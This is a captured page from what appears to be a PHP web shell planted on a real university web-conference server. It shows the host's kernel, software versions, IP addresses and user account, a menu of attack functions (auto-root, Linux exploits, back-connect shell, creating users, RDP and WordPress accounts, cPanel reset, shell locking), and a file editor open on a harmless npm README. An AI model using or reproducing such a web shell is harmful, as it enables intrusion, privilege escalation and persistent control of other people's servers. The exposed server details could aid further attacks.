Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.135.209.20
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-isurl /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
1.32
KB
-rw-r--r--
changelog.Debian.gz
522
B
-rw-r--r--
copyright
3.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# isurl [![NPM Version][npm-image]][npm-url] ![File Size][filesize-image] [![Build Status][travis-image]][travis-url] [![Dependency Monitor][greenkeeper-image]][greenkeeper-url] > Determines whether a value is a WHATWG [`URL`](https://developer.mozilla.org/en/docs/Web/API/URL). Works cross-realm/iframe and despite `Symbol.toStringTag`. ## Installation [Node.js](http://nodejs.org/) `>= 8` is required. To install, type this at the command line: ```shell npm install isurl ``` ## Usage ```js const isURL = require('isurl'); isURL('http://domain/'); //-> false isURL(new URL('http://domain/')); //-> true ``` Optionally, acceptance can be extended to incomplete `URL` implementations that lack `origin`, `searchParams` and `toJSON` properties (which are common in many modern web browsers): ```js const url = new URL('http://domain/?query'); console.log(url.searchParams); //-> undefined isURL.lenient(url); //-> true ``` [npm-image]: https://img.shields.io/npm/v/isurl.svg [npm-url]: https://npmjs.com/package/isurl [filesize-image]: https://img.shields.io/badge/size-1kB%20gzipped-blue.svg [travis-image]: https://img.shields.io/travis/stevenvachon/isurl.svg [travis-url]: https://travis-ci.org/stevenvachon/isurl [greenkeeper-image]: https://badges.greenkeeper.io/stevenvachon/isurl.svg [greenkeeper-url]: https://greenkeeper.io/
Close